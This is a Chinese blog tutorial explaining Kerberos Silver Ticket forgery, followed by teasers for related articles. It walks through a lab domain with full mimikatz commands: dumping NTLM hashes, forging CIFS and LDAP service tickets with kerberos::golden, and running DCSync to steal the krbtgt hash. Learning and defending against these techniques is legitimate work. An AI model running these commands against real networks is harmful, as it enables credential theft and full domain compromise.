白银票据的原理和使用

  • 白银票据(Silver Ticket)原理
  • 白银票据的使用

服务账号是计算机名字+$用来管理服务的账号

白银票据(Silver Ticket)原理

白银票据是伪造本该由TGS返回的ST(服务票据),从而访问对应的服务

  • 有server用户的hash就可以伪造出ST,且不经过KDC,但伪造的票只对部分服务起作用,权限比黄金票据低

白银票据的使用

  1. 控制了DC域控和域内主机WIN7

  2. 从域控获取基本信息
    获取域名称

    获取域SID值(末尾500代表是管理员)

    获取服务账号的NTLM Hash
    mimikatz sekurlsa::logonpasswords

  3. 域控下线,在WIN7伪造服务票据
    此时WIN7无访问域控c盘权限

    查看已有票据:mimikatz kerberos::list 或 powershell klist

    清除已有票据:mimikatz kerberos::purge 或 powershell klist purge

    伪造cifs服务票据:mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-281111118-1086056466-1450022951 /target:dc.hack.com /service:cifs /rc4:0e2fb6d70a6b2a0f4521bea5d91e399b /user:aaa /ptt

  4. 访问域控c盘,只有访问目录权限

    尝试获取krbtgt的NTLM Hash,获取失败,需要有ldap服务的票据
    mimikatz lsadump::dcsync /dc:dc.hack.com /domain:hack.com /user:krbtgt

  5. WIN7伪造LDAP共享服务票据
    mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-281111118-1086056466-1450022951 /target:dc.hack.com /service:LDAP /rc4:0e2fb6d70a6b2a0f4521bea5d91e399b /user:aaa /ptt

    再次执行mimikatz获取Hash命令,成功得到krbtgt的NTLM Hash

    即可制作黄金票据

白银票据的原理和使用相关推荐

  1. 白银票据/黄金票据构造分析

    大家最好在看这篇文章之前,去看下我写的那篇关于认证协议分析的文章:NTLM与kerberos认证体系详解 (下面所说的Server hash指的是服务端机器用户的NTLM hash) 我们的白银票据和 ...

  2. 一文了解黄金票据和白银票据

    前言 某老哥的一次面试里问到了这个问题,故来做一番了解 该攻击方式在BlackHat 2014被提出,演讲者为Alva Duckwall & Benjamin Delpy(@gentilkiw ...

  3. 网络安全之黄金票据,白银票据

    前言:今天来给大家讲讲黄金票据和白银票据 Kerberos认证# 金票Golden ticket# 原理# 伪造金票的场景和所需条件# 利用方式# 银票SILVER TICKET# 原理# 伪造银票所 ...

  4. 「Active Directory Sec」白银票据和黄金票据

    描述 白银票据: 即伪造的TGS.当获取需要访问的目标服务器NTLM HASH后,就可以利用Mimikatz伪造TGS,直接去访问目标服务器.此过程不需要KDC的参与.但缺点是只能访问一个服务. 黄金 ...

  5. 哈希传递攻击/黄金白银票据

    Q&A Q1:pth在什么情况下能成功.哈希传递受到什么限制.什么情况下不能传递? A1:①pth在获取到目标机器中RID为500的内置管理员账户或在目标机器本地管理员组的域成员账户的hash ...

  6. 最浅显易懂kerberos认证和黄金白银票据

    一.kerberos认证 图片来自互联网 一. 1.客户端账号用自己的密码哈希加密(时间戳.客户端.服务端等信息)发送给AS (身份验证服务) AS 收到后进行查找,确认有该账号后生成随机密钥1 2. ...

  7. Kerberos认证介绍及黄金票据和白银票据

    学前介绍 LM协议: 早期SMB协议在网络上传输明文口令.后来出现LAN Manager 挑战和 响应 验证机制简称LM,很简单,容易被破解 NTLM: 微软提出的一种windowsNT挑战/响应验证 ...

  8. php源码 收据管理,黄金票据 白银票据 ms14068(示例代码)

    黄金票据 黄金票据的条件要求: 1.域名称[AD PowerShell模块:(Get-ADDomain).DNSRoot] 2.域的SID 值[AD PowerShell模块:(Get-ADDomai ...

  9. 域渗透之(白银票据利用)

    前言: 上一篇文件里面,已经很详细的和大家介绍了kerberos协议认证的方式了,上次主要说的是黄金票据(伪造TGT),今天主要来和大家分析下白银票据(伪造TGS票据),稍后为大家介绍他们之间的区别. ...

最新文章

  1. Python之父退休,C语言之父与世长辞,各大编程语言创始人现状盘点
  2. centos文本查看及处理相关的常用命令
  3. 在mysql中会话变量前面的字符是什么_在MySQL中仅使用会话变量仅对字符的首次出现执行搜索/替换...
  4. ibatise 没有大于等于吗_农村房屋没有证等于违法建筑吗?下面三个时间点记住,小心被忽悠...
  5. 数学国里有座天才云集的“疯人院”
  6. 小程序Windows和linux,改进后的《自动显示天气预报》小程序(Linux和Windows环境都可以)...
  7. 从面试题中看Java的Reference(引用)
  8. AI绘画网站最全收集!!
  9. 色彩RGBA值写作代码
  10. Gateway整合Nacos前端请求报错404 NOT_FOUNT
  11. date 显示日期月份用英文缩写表示
  12. shit 环信 IM SDK IM SDK web
  13. 用Verilog实现串并转换
  14. 非线性光纤光学——光孤子5
  15. jQuery跳房子插件hopscotch
  16. Windows7系统助手
  17. 如何获取微信公众号文章ID?9步教你!
  18. 【MVSO影视程序源码】影视自动采集+魔改超强SEO+自定义苹果cms资源站接口
  19. Spring4 MVC Hello Wrold
  20. 雷电模拟器python编程接口_【Python实践】_接口模拟器

热门文章

  1. 第一张多米诺 微软黑屏来了
  2. 广东省计算机考试省考跟国考,2020广东省考和国考的内容一样吗
  3. 最新深度学习环境搭建:win10+Anaconda+PyCharm+python3.7+tensorflow-gpu1.15+keras2.3.1+CUDA10.0+CUDNN7.6.5
  4. 小单刷题笔记之迷宫(bfs)
  5. 淘宝tair--分布式 key/value 存储引擎
  6. unity Vector2 与 Vector3的转换
  7. 树莓派4B之Pc端Qgc地面站与Pixhawk飞控连接
  8. Two-Stage Sample Robust Optimization
  9. [Unity Mirror] Network Manager
  10. nohup,disown和的区别